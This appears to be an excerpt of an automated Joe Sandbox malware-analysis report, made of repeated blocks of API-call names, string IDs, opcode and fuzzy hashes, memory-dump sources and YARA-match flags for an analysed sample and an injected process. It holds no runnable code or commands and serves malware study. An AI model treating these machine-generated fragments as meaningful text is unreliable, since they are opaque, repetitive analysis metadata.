                                                                                                                                    • String ID: %%%u$]:%u
                                                                                                                                    • API String ID: 48624451-3050659472
                                                                                                                                    • Opcode ID: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                    • Instruction ID: 1239a3370454f295d773961046354361464e60780b7f443ad738a404e22f19d9
                                                                                                                                    • Opcode Fuzzy Hash: 4b018c4e89ad893542348c7db9d3f304cbc189f5f7fb58baa2c8437803148803
                                                                                                                                    • Instruction Fuzzy Hash: F0314172A00219AFDB20DF2DCC44BAEF7B8AB54610F54455AED49E3245EF30AA458BA0
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                    • String ID: +$-
                                                                                                                                    • API String ID: 1302938615-2137968064
                                                                                                                                    • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction ID: 42db155ea4b44b7f28b8b00fa33eb8e18384742468fcba5fd978021afddd3ca8
                                                                                                                                    • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                                                    • Instruction Fuzzy Hash: B491D671E002069BEF28CF6DC881AFEFBA9EF447A8F54451AED55E72C4D73489818B11
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000002.00000002.2050668467.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_2_2_16f0000_SDBARVe3d3.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: $$@
                                                                                                                                    • API String ID: 0-1194432280
                                                                                                                                    • Opcode ID: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                    • Instruction ID: b9d07e1727f254928b0668f64349f3f947d95071648d9182a0a8e9088cb2ec01
                                                                                                                                    • Opcode Fuzzy Hash: 6e7c940d83f2fccf37da5863615b81d3e7fbc7cab1c585d867ee54c6da86aba5
                                                                                                                                    • Instruction Fuzzy Hash: CD812A71D402799BDB319B54CC44BEAF7B8AF48714F1441EAEA09B7241E7709E85CFA0

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:3.2%
                                                                                                                                    Dynamic/Decrypted Code Coverage:4%
                                                                                                                                    Signature Coverage:2.1%
                                                                                                                                    Total number of Nodes:475
                                                                                                                                    Total number of Limit Nodes:77

                                                                                                                                    Control-flow Graph

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 2$):$+x$1`$<8$>$BL$Fv$L$R<$[$g$l$lv$u7$}$5
                                                                                                                                    • API String ID: 0-2604029153
                                                                                                                                    • Opcode ID: cbde5d38693fc39788544a4ae2cd40bf7f64d6e88385f7ff788a72cbffd7e7b6
                                                                                                                                    • Instruction ID: 08b44420abe0d4d0fd75aeb61711b85095770e644892e7920ee4e25288b446c1
                                                                                                                                    • Opcode Fuzzy Hash: cbde5d38693fc39788544a4ae2cd40bf7f64d6e88385f7ff788a72cbffd7e7b6
                                                                                                                                    • Instruction Fuzzy Hash: 5302C4B0D05269CBEB24CF84D994BDDBBB2BB44308F1081DAC2097B291DBB55E89CF55
                                                                                                                                    APIs
                                                                                                                                    • FindFirstFileW.KERNELBASE(?,00000000), ref: 02A1C5E4
                                                                                                                                    • FindNextFileW.KERNELBASE(?,00000010), ref: 02A1C61F
                                                                                                                                    • FindClose.KERNELBASE(?), ref: 02A1C62A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Find$File$CloseFirstNext
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3541575487-0
                                                                                                                                    • Opcode ID: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                                                                                                    • Instruction ID: 6523829950462e741ae1a783a67bc3e90760741811f7727d980db605215df960
                                                                                                                                    • Opcode Fuzzy Hash: 86011c127d856a0f2cf1489457390f07b8c344b9b3ec3ab41ca31718808f41b2
                                                                                                                                    • Instruction Fuzzy Hash: 3031C6B1980348BBDB20EB64CD85FEF777D9F54718F104459BA18A7180EF70AA84CBA1
                                                                                                                                    APIs
                                                                                                                                    • NtCreateFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?,?,?), ref: 02A290FE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                    • Opcode ID: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                                                                                                    • Instruction ID: 82a8119c421a6dfe2492be25baaaf1e22016c3f4f64bbd7d55dc288633f4ce60
                                                                                                                                    • Opcode Fuzzy Hash: 6c116602c3ce2a7586dbde19a51ad50e29691ae579f357658d5e73b24c415cbe
                                                                                                                                    • Instruction Fuzzy Hash: 8B31D3B1A00208AFDB14DF98D980EEEB7B9AF8C304F108219F918A7344D734A8458BA4
                                                                                                                                    APIs
                                                                                                                                    • NtReadFile.NTDLL(?,?,?,?,?,?,FC8E4B7A,?,?), ref: 02A29253
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                                                                                                    • Instruction ID: cbc918fc70ecfbf5ce471dfaa94fcf338066e5c3bd9a0d366dc05365d5e0f0d2
                                                                                                                                    • Opcode Fuzzy Hash: 2825084812d6e97e4a90768c6b76eb88233662d4728ecb26d01c52c31c1abc37
                                                                                                                                    • Instruction Fuzzy Hash: 8D31D2B5A40208AFDB14DF98D980EEFB7B9EF88714F108219F919A7240D774A9158FA4
                                                                                                                                    APIs
                                                                                                                                    • NtAllocateVirtualMemory.NTDLL(02A11CCB,?,02A27F3E,00000000,00000004,00003000,?,?,?,?,?,02A27F3E,02A11CCB,02A2B3B1,02A27F3E,56C03309), ref: 02A29528
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocateMemoryVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2167126740-0
                                                                                                                                    • Opcode ID: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                                                                                                    • Instruction ID: 9db06a9a3c3c1c3c96d38d8f69c49dd905767c591c4bac0d1e68a59b0ec84778
                                                                                                                                    • Opcode Fuzzy Hash: b03ee4917efc09109f1d551df49a914dcd29543988b4e9671e209da27d2be6ba
                                                                                                                                    • Instruction Fuzzy Hash: C3212BB5A40209AFDB10DF98DD81FEF77B9EF88700F104209FD19A7240DB74A9158BA1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DeleteFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                    • Opcode ID: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                                                                                                    • Instruction ID: e58d16e21e1ef7fd4944b5190dda78351e12db02dd7f80d9ab52ad0b3234b0cb
                                                                                                                                    • Opcode Fuzzy Hash: 87a012ad8a58bfa591f051fcc329374b3f67c791c4c7b4710c4fbe4803f8a9ba
                                                                                                                                    • Instruction Fuzzy Hash: B411A3719402197BD720EB98CD41FEB73ADDF84714F104149F908A7280DB75B9058BA1
                                                                                                                                    APIs
                                                                                                                                    • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02A29334
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4133454064.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_2a00000_fc.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Close
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3535843008-0
                                                                                                                                    • Opcode ID: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                                                                                    • Instruction ID: f9c318a97288e5efbe837c67dde68009625da7e62b92ac26b2e782d847fe318d
                                                                                                                                    • Opcode Fuzzy Hash: 55414cb2eea5425d9ef389f5a0183cee491df25370640f6f28825660923570ad
                                                                                                                                    • Instruction Fuzzy Hash: 1AE08C32240214BBE220EE59DC41FDBB7ADDFC5764F408419FA0CA7241CA71B9118BF0
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: dcc3a6211633955e45183153744fbb28bbac6a73d69ed7ed7d35dabb39382c0b
                                                                                                                                    • Instruction ID: bd9742e2fc67e34adbc1c1a2e83220dc8db4b834a0628383fe84bfaae087893a
                                                                                                                                    • Opcode Fuzzy Hash: dcc3a6211633955e45183153744fbb28bbac6a73d69ed7ed7d35dabb39382c0b
                                                                                                                                    • Instruction Fuzzy Hash: B7900435705C1413D140F15C4DC45474015D7F5301F55D011F0435554CCF14CF575371
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: b4af7eca0c666d611a6dcfe508d32024548c4d5a301d02c098c5ff1db88a1fa6
                                                                                                                                    • Instruction ID: 04b237cfa3507a65d258a47c407e09856e8bf1af0d5d54983d49b21d151b42a8
                                                                                                                                    • Opcode Fuzzy Hash: b4af7eca0c666d611a6dcfe508d32024548c4d5a301d02c098c5ff1db88a1fa6
                                                                                                                                    • Instruction Fuzzy Hash: 70900475701514434140F15C4D044077015D7F73013D5D115F0555570CC71CCD55D37D
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 2f55122a72468841df935fb8f0b05bf4fd632d9d298fd690158522ea54fa11e8
                                                                                                                                    • Instruction ID: 61522353d13da1e6a99ce40d057d10ec2f451ba5dd576122dd1d2c0ea0fa5d4d
                                                                                                                                    • Opcode Fuzzy Hash: 2f55122a72468841df935fb8f0b05bf4fd632d9d298fd690158522ea54fa11e8
                                                                                                                                    • Instruction Fuzzy Hash: 7F90023560551803D100B1584614706101587D5201F65D411A0425568D87958A5165A2
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 9c71cab96b2e0d59a912d9fd6261f6c1245e08e1dc2d77c3a99f7c1f0282983a
                                                                                                                                    • Instruction ID: e7a402bf1a4e7ac925da0f297bc96bae860b3c867bd0c0a6bd33e4d30c0f55ca
                                                                                                                                    • Opcode Fuzzy Hash: 9c71cab96b2e0d59a912d9fd6261f6c1245e08e1dc2d77c3a99f7c1f0282983a
                                                                                                                                    • Instruction Fuzzy Hash: FC900475303414034105F15C4514717401FC7F5301F55D031F10155D0DC735CDD17135
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 07808b4ce79aa1e3f448c23b3d57448c26f39308c6906b7fc2f28fa4a1cd4b15
                                                                                                                                    • Instruction ID: 117540f6f40726095525a8b1b6b1330f66fd1adde0d577cdafd05aed1de6e98c
                                                                                                                                    • Opcode Fuzzy Hash: 07808b4ce79aa1e3f448c23b3d57448c26f39308c6906b7fc2f28fa4a1cd4b15
                                                                                                                                    • Instruction Fuzzy Hash: C990043570541C03D150F15C45147470015C7D5301F55D011F0035754DC755CF5577F1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 95e49b31d5b640590416125a1addc19d7ca87b8f3b9eaae6fcd37f1764eef324
                                                                                                                                    • Instruction ID: c727284fb4da95a6c6fbc125544caa9cb5caf83feffa9220b40f30243aea4a9d
                                                                                                                                    • Opcode Fuzzy Hash: 95e49b31d5b640590416125a1addc19d7ca87b8f3b9eaae6fcd37f1764eef324
                                                                                                                                    • Instruction Fuzzy Hash: 2290023520141C03D180B158450464A001587D6301F95D015A0026654DCB158B5977A1
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4b6f0c573f2bae13e96d048884a819c215010f2517f880c39ebf12776def0e93
                                                                                                                                    • Instruction ID: e7a4138c4e946f357f521cb666ad2012c87d0de22a9ba5047d80ce4c2b340273
                                                                                                                                    • Opcode Fuzzy Hash: 4b6f0c573f2bae13e96d048884a819c215010f2517f880c39ebf12776def0e93
                                                                                                                                    • Instruction Fuzzy Hash: F790023520545C43D140B1584504A46002587D5305F55D011A0065694D97258E55B661
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4a09c4a2a5d70ee0b5d16be39943252ccc7a3b1ad2eda8179e3fa1bb8ae1d151
                                                                                                                                    • Instruction ID: bd742ce567c8efabb31ee40d4d369214b0ea0b9c9bdf1fc8362080560cc32505
                                                                                                                                    • Opcode Fuzzy Hash: 4a09c4a2a5d70ee0b5d16be39943252ccc7a3b1ad2eda8179e3fa1bb8ae1d151
                                                                                                                                    • Instruction Fuzzy Hash: 7090043D311414030105F55C07045070057C7DF351355D031F1017550CD731CD715131
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: cb2bbebd61552d2a1989f5ed05b9ac66488a427ec3f1afc8f32db070e62136a8
                                                                                                                                    • Instruction ID: 76b1d66953536119d70d75daaeb0a9b5d7d1018e43691128ee4f09ba2765e458
                                                                                                                                    • Opcode Fuzzy Hash: cb2bbebd61552d2a1989f5ed05b9ac66488a427ec3f1afc8f32db070e62136a8
                                                                                                                                    • Instruction Fuzzy Hash: 97900229221414030145F558070450B045597DB351395D015F1417590CC72189655321
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 5b541049ccbd0a47ca45ad0fdf4666f785a14a3fbc7ebb9e9283b95309243c75
                                                                                                                                    • Instruction ID: c12df08b88b4abb3dca2afe1b994f48010b45b6c8f43fcf13981d57722a5b9ea
                                                                                                                                    • Opcode Fuzzy Hash: 5b541049ccbd0a47ca45ad0fdf4666f785a14a3fbc7ebb9e9283b95309243c75
                                                                                                                                    • Instruction Fuzzy Hash: BD90043534547503D150F15C45047174015F7F5301F55D031F0C155D4DC755CD557331
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 217adcf7055134956bc526a5a145c971c105b78ea17795600db5efec25fef065
                                                                                                                                    • Instruction ID: 9796a762a114b29f894d7ed4a52075e2fd65000e024be505c92636745570a48c
                                                                                                                                    • Opcode Fuzzy Hash: 217adcf7055134956bc526a5a145c971c105b78ea17795600db5efec25fef065
                                                                                                                                    • Instruction Fuzzy Hash: AB90026534141843D100B1584514B060015C7E6301F55D015E1065554D8719CD526126
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 3cdefb44b930a5786b3a915773a42cb43e689fa73bd34705924edb80db713024
                                                                                                                                    • Instruction ID: 2c319763b63f2107ed689a0be8ff83a925b6b9f39817f700f96ec79558563c10
                                                                                                                                    • Opcode Fuzzy Hash: 3cdefb44b930a5786b3a915773a42cb43e689fa73bd34705924edb80db713024
                                                                                                                                    • Instruction Fuzzy Hash: 68900225601414434140B16889449064015ABE6211755D121A0999550D875989655665
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 82d161b95e5491ac05363f137f908701a86721a2f6a8724de9e18cd6b8f3c182
                                                                                                                                    • Instruction ID: 562700bdc2a205fd09c3b5c502bc6f0409dde84d0856f88312acbe1e651e8bd9
                                                                                                                                    • Opcode Fuzzy Hash: 82d161b95e5491ac05363f137f908701a86721a2f6a8724de9e18cd6b8f3c182
                                                                                                                                    • Instruction Fuzzy Hash: DE900435311C1443D300F57C4D14F070015C7D5303F55D115F0155554CCF15CD715531
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000007.00000002.4135117782.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: true
                                                                                                                                    • Associated: 00000007.00000002.4135117782.0000000003279000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.000000000327D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    • Associated: 00000007.00000002.4135117782.00000000032EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_7_2_3150000_fc.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                    • Opcode ID: 4d6c5dd4c80077ba82584c49b2a40c601df44e0a5c21f7db2cdc79a59f25768c
                                                                                                                                    • Instruction ID: 740afa6bc5a0151c36c31ce06c88fe15ffaaeddc9fbdbc6f3b5714c03b61076d
                                                                                                                                    • Opcode Fuzzy Hash: 4d6c5dd4c80077ba82584c49b2a40c601df44e0a5c21f7db2cdc79a59f25768c
                                                                                                                                    • Instruction Fuzzy Hash: E690022560141903D101B1584504616001A87D5241F95D022A1025555ECB258A92A131
                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
